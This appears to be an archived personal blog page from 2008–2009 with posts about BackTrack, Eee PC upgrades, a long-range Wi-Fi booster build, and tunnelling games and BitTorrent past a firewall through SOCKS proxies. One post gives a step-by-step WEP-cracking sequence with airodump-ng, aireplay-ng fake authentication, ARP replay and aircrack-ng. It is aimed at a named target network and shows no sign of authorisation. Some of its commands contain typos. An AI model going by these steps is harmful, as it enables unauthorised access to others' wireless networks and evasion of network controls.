Archive for the ‘Hacking’ Category

Backtrack 4 BETA Release is Out!

Monday, March 16th, 2009

bt4_logo

Going to download/install this on my Eee PC tonight! http://www.remote-exploit.org/backtrack_download.html They also have the VMware Image up for download too.

Here is an official installer guide;
http://www.offensive-security.com/documentation/bt4install.pdf

Also some good information here ont his blog, where you can download the BackTrack automatic installer (which they had in BT3-beta).
http://kin.calvin.free.fr/blog/?p=16

Vote in HexoSearch

eee pc…loving it!

Thursday, December 25th, 2008

Got an eee pc for xmas! (love my gf!!) (1000 – atom 1.6, 40gb ssd, wireless, bt) so amazing loving this thing one of the main reasons for getting it was for backtrack|3 (portable hacking machine) its also going to be really nice when i go over to japan next year (09 – trip of a life time!!!) just to be-able to have all my personal access email/web… plan on doing some pretty extensive mods to this aswell here are a few i’m planning on;

-backtrack|3 – greatest linux distro ever built (found this very useful)
- back-lit keyboard (more here)
- internal updated wireless card (Atheros) with external antenna jack mod (with booster).
- ultra fast SD(hc) card for my backtrack|3 installation – Sandisk 8gb Extreme III (go for around 30£’s) (ebay)
- RAM upgrade (533/667 MHz DDR2 RAM via a standard SO-DIMM module, the hardware supports up to 4GB)
- HSPA internal mod (internet access wherever i am).

will list more as i go along so expect some photos to follow.

//links
- remote exploit – backtrack|3 (link)
- eee user forums (link)
- backtrack|3 installer (link)

Vote in HexoSearch

WEP HACK – revised // wireless booster 5-KM’s!!!!++++

Sunday, March 16th, 2008

WEP HACK (v0.2)

This is my newer version/exploration of WEP hacking/cracking this will allow the use of ‘aireplay-ng’ to do brute force attack on the AP increasing the speed of cracking the WEP code/IVs sent, by injecting continuous packets directory into the AP, WPA-PSK Hack coming soon :)


01:

-c = channel which target network is transmitting on
-w = dump file prefix
-i = save only captured IVs
*rausb0 = change to your wireless interface name (type ‘iwconfig’ in new shell to set to monitor mode to enable packet injection).

airodump-ng – c 11 -w wep -i raush0

02:

-1 = fake authentication
0 = reassociation timing in secounds
-e = target network essid
-a = access point MAC address
-h = your cards MAC address

aireplay-ng -1 0 -e ULA_KK -a (their MAC) -h (my MAC) rausb0

03:

-3 = standard arp request replay
-b = access point MAC address
-h = source MAC address (either an associated client or from fake authentication)

aireplay-ng -3 -b (their MAC) -h (my MAC)

04:

-a = force attack mode
1 = static WEP
-0 = apply colors in aircrack
-n = specify the length of the key (128 104-bit WEP)

aircrack-ng -a 1 -0 -n 128 wep-01.ivs (chose target)

//end

in the process of making a video/tutorial of how to crack/hack wireless signal.

been researching into building a 5KM wireless signal booster, here is what the built consists of so far:

2 Meter RP-SMA WiFi Extension Lead – HDF400 PRO Range (£19.95)
2x RP SMA Male to N-Type Male Adaptor WiFi WLAN (£2.50)
Senao NL-2511 CD PLUS EXT2 200mw 802.11b wireless card – MMCX to SMA pigtail (£24.15)
10 Meter RP-SMA WiFi Extension Lead – HDF400 PRO Range (£29.95)
1000mW / 1Watt WiFi Power Booster indoor/outdoor – N-Female (£149.95)
2.4 GHZ OMNI ANTENNA 22dBI – N-female (£50.00)

Going for a omni directional antenna for (to start off with first prolly only get about 2-3KM’s boost) now but looking into putting a 2 way splitter on the booster and having a 30dbm direction motorised 360 digrea dish, for extra coverage, cant wait ;x

you can get everything from eBay for under £300’s cant wait to get this baby up and running..

//1NF3C710N.

Vote in HexoSearch

Proxy bypass via SSH tunneling behind a firewall+

Monday, February 25th, 2008

What to?
run applications like games and p2p downloaders, behind a wirewall, this will work for:
WOW: world of war craft
Steam network: css dod hl series etc.
bit torrent applications (any client is supported).

All you need!
SSH tunneling behind a wirewall, directly connect to a remote proxy server.

I have found some very helpful applications and services to do this, you need…

Service
Proxy server/tunneling service (its free for 6 hours thereafter you have to pay well worth it though) – http://www.your-freedom.net
.

Software
Proxy applications (these programs allow you to tunnel windows applications through HTTP and SOCKS)
ProxyCap – http://www.proxycap.com
FreeCap – http://www.freecap.ru
Proxifier – http://www.proxifier.com
Sockscap – http://archive.socks.permeo.com

Setup
As far as it goes on ‘Your Freedom’ proxy servers you will need to.

Steam
Go to Preferences -> Proxies:
Set up the following options: socks 5, localhost, 1080.
Moreover, make sure UDP is ticked..
Then add steam.exe and hl.exe (from your steam folder[s]) and it should work
Start your freedom, and open steam via Proxycap (Sockscap).



World of Warcraft
1. You only need one other program other than YF and WoW, this is SocksCap, which used to be available for download from Permeo’s web site but is no longer since the company was acquired by Blue Coat. Just google for it. The last released version is 2.40. If you can’t find it, send us an email and we’ll help you out.
2. Make sure YF is set so that the Socks 4/5 port is enabled and set to 1080 (that’s the default)
3. Open up SocksCap, click on File and then go to Settings and make sure the

SOCKS Settings tab looks like this:

With the SOCKS Server set to “localhost” and port set to “1080″

4. Now click on the “New” button on the Sockscap main window, then click on the browse button in the window that comes up. Go to the folder “C:\Program Files\World of Warcraft” (or wherever your WoW folder is stored) and double click on the program called WoW.exe. The Sockscap main window should now look like this:

5. Make sure YF is connected to a European Server if you’re playing WoW in Europe, or to an American server if you are playing in America, as this will reduce lag in the game.
6. Once YF is connected, double click on the WoW icon in the main Sockscap window, or click on the WoW icon and then click on the “Run!” button. World of Warcraft will now run and connect to the WoW server when you log in.

More applications and games can be found here, http://www.your-freedom.net/index.php?id=4

by 1NF3C710n / happy hacking cracking!

Vote in HexoSearch

Wireless Hacking+

Thursday, January 31st, 2008

Anyone interested in wireless hacking/cracking I have recently written a pretty comprehensive guide on the subject, very easy to use step-by-step walkthrough.

Get your copy here: click here

I’m writing a new version of the guide which will include an example of using backtrack 2 within windows (xp/vista) shell, so no need to boot into linux this will save time and money (instead of getting money on expensive airpcap adapters).

Watch this space!

Vote in HexoSearch
  • Categories

  • Recent Comments

  • Recent Posts

  • Tumblr

  • Flickr Recent Photos

    cherry tree woodstonja_gravestonesPockey Chimp FlavourAUTO FTW! :)darkdaystayouttiger kittenbirdofpreyfirst photo i took with my 1000dself_portrait_02
  • XFIRE (wkly hrs pld)

  • Last.FM

  • Tags

    .MP4 Actionscript Action Script Advertising AS2 AS3 backtrack BT4 bug Call of Duty capcom centOS cpanel crossdomain Eyeblaster eyeblaster HD f4v Flash h264 HD high definition Install internet explorer Linux load loadMovie MIME MIME Types MW2 Nazi Zombies pc PHP ports preloader release date rich media shared objects Stage SWF SWFOBJECT torrents Video video/mp4 VMware win7